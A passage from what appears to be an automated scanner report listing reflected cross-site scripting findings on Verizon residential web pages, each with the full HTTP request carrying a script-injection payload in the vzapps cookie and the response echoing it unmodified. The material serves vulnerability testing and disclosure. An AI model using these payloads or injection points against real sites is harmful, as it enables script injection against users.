<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX33CF3<SCRIPT>ALERT(1)</SCRIPT>F0CF15E82F9 </DIV>
...[SNIP]...

3.228. http://www22.verizon.com/Residential/HomePhone/FiOSDigitalVoice/Features/Features.htm [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HomePhone/FiOSDigitalVoice/Features/Features.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 70270'><script>alert(1)</script>55b92e6b12d was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HomePhone/FiOSDigitalVoice/Features/Features.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX70270'><script>alert(1)</script>55b92e6b12d; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 307358
Expires: Sat, 20 Nov 2010 00:12:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:12:12 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:12 GMT; path=/
Set-Cookie: ContextInfo_State=TX70270'><script>alert(1)</script>55b92e6b12d; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:12 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:12 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:12 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX70270'><SCRIPT>ALERT(1)</SCRIPT>55B92E6B12D ' />
...[SNIP]...

3.229. http://www22.verizon.com/Residential/HomePhone/FiOSDigitalVoice/HowItWorks/HowItWorks.htm [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HomePhone/FiOSDigitalVoice/HowItWorks/HowItWorks.htm

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 4a3fe<script>alert(1)</script>8693fabb78c was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HomePhone/FiOSDigitalVoice/HowItWorks/HowItWorks.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX4a3fe<script>alert(1)</script>8693fabb78c; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 202315
Expires: Sat, 20 Nov 2010 00:16:05 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:16:05 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:16:04 GMT; path=/
Set-Cookie: ContextInfo_State=TX4a3fe<script>alert(1)</script>8693fabb78c; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:16:04 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:16:04 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:16:04 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX4A3FE<SCRIPT>ALERT(1)</SCRIPT>8693FABB78C </DIV>
...[SNIP]...

3.230. http://www22.verizon.com/Residential/HomePhone/FiOSDigitalVoice/HowItWorks/HowItWorks.htm [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HomePhone/FiOSDigitalVoice/HowItWorks/HowItWorks.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2fb11'><script>alert(1)</script>c9082fb4a68 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HomePhone/FiOSDigitalVoice/HowItWorks/HowItWorks.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX2fb11'><script>alert(1)</script>c9082fb4a68; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 202319
Expires: Sat, 20 Nov 2010 00:16:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:16:03 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:16:03 GMT; path=/
Set-Cookie: ContextInfo_State=TX2fb11'><script>alert(1)</script>c9082fb4a68; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:16:03 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:16:03 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:16:03 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX2FB11'><SCRIPT>ALERT(1)</SCRIPT>C9082FB4A68 ' />
...[SNIP]...

3.231. http://www22.verizon.com/Residential/Internet/ [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/Internet/

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload a439f<script>alert(1)</script>4e7b1405640 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/Internet/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXa439f<script>alert(1)</script>4e7b1405640; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 73116
Expires: Sat, 20 Nov 2010 00:11:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:11:06 GMT
Connection: close
Set-Cookie: ContextInfo_State=TXa439f<script>alert(1)</script>4e7b1405640; path=/
Set-Cookie: ContextInfo_LoopQual=; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | Internet
</title><meta name="keywords" content="verizon internet services, verizon internet products, ISP, internet service, fios internet
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TXA439F<SCRIPT>ALERT(1)</SCRIPT>4E7B1405640 </DIV>
...[SNIP]...

3.232. http://www22.verizon.com/Residential/Internet/ [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/Internet/

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 18609'><script>alert(1)</script>38eb9406858 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/Internet/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX18609'><script>alert(1)</script>38eb9406858; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 73121
Expires: Sat, 20 Nov 2010 00:10:11 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:10:11 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX18609'><script>alert(1)</script>38eb9406858; path=/
Set-Cookie: ContextInfo_LoopQual=; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | Internet
</title><meta name="keywords" content="verizon internet services, verizon internet products, ISP, internet service, fios internet
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX18609'><SCRIPT>ALERT(1)</SCRIPT>38EB9406858 ' />
...[SNIP]...

3.233. http://www22.verizon.com/Residential/Services/ [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/Services/

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a33c2'><script>alert(1)</script>e9e9cf39ae6 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/Services/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXa33c2'><script>alert(1)</script>e9e9cf39ae6; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 55449
Expires: Sat, 20 Nov 2010 00:16:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:16:02 GMT
Connection: close
Set-Cookie: ContextInfo_State=TXa33c2'><script>alert(1)</script>e9e9cf39ae6; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | Internet | Essential Services
</title><meta name="keyword" content="verizon internet security, online backup, online sharing, file sharing
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXA33C2'><SCRIPT>ALERT(1)</SCRIPT>E9E9CF39AE6 ' />
...[SNIP]...

3.234. http://www22.verizon.com/Residential/Services/BackupandSharing/BackupandSharing.htm [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/Services/BackupandSharing/BackupandSharing.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d2a62'><script>alert(1)</script>712158990f3 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/Services/BackupandSharing/BackupandSharing.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXd2a62'><script>alert(1)</script>712158990f3; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 60755
Expires: Sat, 20 Nov 2010 00:16:09 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:16:09 GMT
Connection: close
Set-Cookie: ContextInfo_State=TXd2a62'><script>alert(1)</script>712158990f3; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | Essential Services: Backup and Sharing
</title><meta name="keywords" content="back up pc, backup pc, pc backup, back up Mac, back up Macin
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXD2A62'><SCRIPT>ALERT(1)</SCRIPT>712158990F3 ' />
...[SNIP]...

3.235. http://www22.verizon.com/Residential/Services/SecuritySuite/SecuritySuite.htm [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/Services/SecuritySuite/SecuritySuite.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7daef'><script>alert(1)</script>c934f3f7b2c was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/Services/SecuritySuite/SecuritySuite.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX7daef'><script>alert(1)</script>c934f3f7b2c; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 64651
Expires: Sat, 20 Nov 2010 00:16:17 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:16:17 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX7daef'><script>alert(1)</script>c934f3f7b2c; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | Essential Services: Internet Security Suite
</title><meta name="keywords" description="anti-virus, firewall, anti-spyware, internet parent
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX7DAEF'><SCRIPT>ALERT(1)</SCRIPT>C934F3F7B2C ' />
...[SNIP]...

3.236. http://www22.verizon.com/Residential/Services/TechnicalSupport/TechnicalSupport.htm [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/Services/TechnicalSupport/TechnicalSupport.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c5db1'><script>alert(1)</script>7ef783c9f97 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/Services/TechnicalSupport/TechnicalSupport.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXc5db1'><script>alert(1)</script>7ef783c9f97; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 60724
Expires: Sat, 20 Nov 2010 00:16:16 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:16:16 GMT
Connection: close
Set-Cookie: ContextInfo_State=TXc5db1'><script>alert(1)</script>7ef783c9f97; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | Essential Services: Expert Care
</title><meta name="keywords" content="computer support, tech support, pc support, computer services, comp
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXC5DB1'><SCRIPT>ALERT(1)</SCRIPT>7EF783C9F97 ' />
...[SNIP]...

3.237. http://www22.verizon.com/Residential/TV/ [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/TV/

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8fc1d'><script>alert(1)</script>57067391278 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/TV/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX8fc1d'><script>alert(1)</script>57067391278; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 76231
Expires: Sat, 20 Nov 2010 00:11:46 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:11:46 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX8fc1d'><script>alert(1)</script>57067391278; path=/
Set-Cookie: ContextInfo_LoopQual=; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | FIOS TV + HD TV Service
</title><meta name="keywords" content="video on demand, vod, premium cable tv, cable service, cable internet, dsl
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX8FC1D'><SCRIPT>ALERT(1)</SCRIPT>57067391278 ' />
...[SNIP]...

3.238. http://www22.verizon.com/Residential/TV/ [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/TV/

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 6c93f<script>alert(1)</script>ad59696c099 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/TV/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX6c93f<script>alert(1)</script>ad59696c099; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 74630
Expires: Sat, 20 Nov 2010 00:12:07 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:12:07 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX6c93f<script>alert(1)</script>ad59696c099; path=/
Set-Cookie: ContextInfo_LoopQual=; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | FIOS TV + HD TV Service
</title><meta name="keywords" content="video on demand, vod, premium cable tv, cable service, cable internet, dsl
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX6C93F<SCRIPT>ALERT(1)</SCRIPT>AD59696C099 </DIV>
...[SNIP]...

3.239. http://www22.verizon.com/Residential/WiFi/ [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/WiFi/

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload c1b7b<script>alert(1)</script>28eee026df0 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/WiFi/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
